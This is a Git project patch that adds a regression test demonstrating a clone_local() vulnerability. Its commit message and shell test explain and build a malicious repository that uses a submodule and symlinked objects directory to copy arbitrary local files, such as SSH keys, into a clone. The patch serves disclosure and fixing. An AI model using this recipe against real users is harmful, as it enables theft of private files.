1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
|
From 58325b93c5b6212697b088371809e9948fee8052 Mon Sep 17 00:00:00 2001
From: Taylor Blau <me@ttaylorr.com>
Date: Tue, 24 Jan 2023 19:43:45 -0500
Subject: [PATCH] t5619: demonstrate clone_local() with ambiguous transport
When cloning a repository, Git must determine (a) what transport
mechanism to use, and (b) whether or not the clone is local.
Since f38aa83f9a (use local cloning if insteadOf makes a local URL,
2014-07-17), the latter check happens after the remote has been
initialized, and references the remote's URL instead of the local path.
This is done to make it possible for a `url.<base>.insteadOf` rule to
convert a remote URL into a local one, in which case the `clone_local()`
mechanism should be used.
However, with a specially crafted repository, Git can be tricked into
using a non-local transport while still setting `is_local` to "1" and
using the `clone_local()` optimization. The below test case
demonstrates such an instance, and shows that it can be used to include
arbitrary (known) paths in the working copy of a cloned repository on a
victim's machine[^1], even if local file clones are forbidden by
`protocol.file.allow`.
This happens in a few parts:
1. We first call `get_repo_path()` to see if the remote is a local
path. If it is, we replace the repo name with its absolute path.
2. We then call `transport_get()` on the repo name and decide how to
access it. If it was turned into an absolute path in the previous
step, then we should always treat it like a file.
3. We use `get_repo_path()` again, and set `is_local` as appropriate.
But it's already too late to rewrite the repo name as an absolute
path, since we've already fed it to the transport code.
The attack works by including a submodule whose URL corresponds to a
path on disk. In the below example, the repository "sub" is reachable
via the dumb HTTP protocol at (something like):
http://127.0.0.1:NNNN/dumb/sub.git
However, the path "http:/127.0.0.1:NNNN/dumb" (that is, a top-level
directory called "http:", then nested directories "127.0.0.1:NNNN", and
"dumb") exists within the repository, too.
To determine this, it first picks the appropriate transport, which is
dumb HTTP. It then uses the remote's URL in order to determine whether
the repository exists locally on disk. However, the malicious repository
also contains an embedded stub repository which is the target of a
symbolic link at the local path corresponding to the "sub" repository on
disk (i.e., there is a symbolic link at "http:/127.0.0.1/dumb/sub.git",
pointing to the stub repository via ".git/modules/sub/../../../repo").
This stub repository fools Git into thinking that a local repository
exists at that URL and thus can be cloned locally. The affected call is
in `get_repo_path()`, which in turn calls `get_repo_path_1()`, which
locates a valid repository at that target.
This then causes Git to set the `is_local` variable to "1", and in turn
instructs Git to clone the repository using its local clone optimization
via the `clone_local()` function.
The exploit comes into play because the stub repository's top-level
"$GIT_DIR/objects" directory is a symbolic link which can point to an
arbitrary path on the victim's machine. `clone_local()` resolves the
top-level "objects" directory through a `stat(2)` call, meaning that we
read through the symbolic link and copy or hardlink the directory
contents at the destination of the link.
In other words, we can get steps (1) and (3) to disagree by leveraging
the dangling symlink to pick a non-local transport in the first step,
and then set is_local to "1" in the third step when cloning with
`--separate-git-dir`, which makes the symlink non-dangling.
This can result in data-exfiltration on the victim's machine when
sensitive data is at a known path (e.g., "/home/$USER/.ssh").
The appropriate fix is two-fold:
- Resolve the transport later on (to avoid using the local
clone optimization with a non-local transport).
- Avoid reading through the top-level "objects" directory when
(correctly) using the clone_local() optimization.
This patch merely demonstrates the issue. The following two patches will
implement each part of the above fix, respectively.
[^1]: Provided that any target directory does not contain symbolic
links, in which case the changes from 6f054f9fb3 (builtin/clone.c:
disallow `--local` clones with symlinks, 2022-07-28) will abort the
clone.
Reported-by: yvvdwf <yvvdwf@gmail.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
---
t/t5619-clone-local-ambiguous-transport.sh | 63 ++++++++++++++++++++++
1 file changed, 63 insertions(+)
create mode 100755 t/t5619-clone-local-ambiguous-transport.sh
diff --git a/t/t5619-clone-local-ambiguous-transport.sh b/t/t5619-clone-local-ambiguous-transport.sh
new file mode 100755
index 0000000000..7ebd31a150
--- /dev/null
+++ b/t/t5619-clone-local-ambiguous-transport.sh
@@ -0,0 +1,63 @@
+#!/bin/sh
+
+test_description='test local clone with ambiguous transport'
+
+. ./test-lib.sh
+. "$TEST_DIRECTORY/lib-httpd.sh"
+
+if ! test_have_prereq SYMLINKS
+then
+ skip_all='skipping test, symlink support unavailable'
+ test_done
+fi
+
+start_httpd
+
+REPO="$HTTPD_DOCUMENT_ROOT_PATH/sub.git"
+URI="$HTTPD_URL/dumb/sub.git"
+
+test_expect_success 'setup' '
+ mkdir -p sensitive &&
+ echo "secret" >sensitive/secret &&
+
+ git init --bare "$REPO" &&
+ test_commit_bulk -C "$REPO" --ref=main 1 &&
+
+ git -C "$REPO" update-ref HEAD main &&
+ git -C "$REPO" update-server-info &&
+
+ git init malicious &&
+ (
+ cd malicious &&
+
+ git submodule add "$URI" &&
+
+ mkdir -p repo/refs &&
+ touch repo/refs/.gitkeep &&
+ printf "ref: refs/heads/a" >repo/HEAD &&
+ ln -s "$(cd .. && pwd)/sensitive" repo/objects &&
+
+ mkdir -p "$HTTPD_URL/dumb" &&
+ ln -s "../../../.git/modules/sub/../../../repo/" "$URI" &&
+
+ git add . &&
+ git commit -m "initial commit"
+ ) &&
+
+ # Delete all of the references in our malicious submodule to
+ # avoid the client attempting to checkout any objects (which
+ # will be missing, and thus will cause the clone to fail before
+ # we can trigger the exploit).
+ git -C "$REPO" for-each-ref --format="delete %(refname)" >in &&
+ git -C "$REPO" update-ref --stdin <in &&
+ git -C "$REPO" update-server-info
+'
+
+test_expect_failure 'ambiguous transport does not lead to arbitrary file-inclusion' '
+ git clone malicious clone &&
+ git -C clone submodule update --init &&
+
+ test_path_is_missing clone/.git/modules/sub/objects/secret
+'
+
+test_done
--
2.30.2
|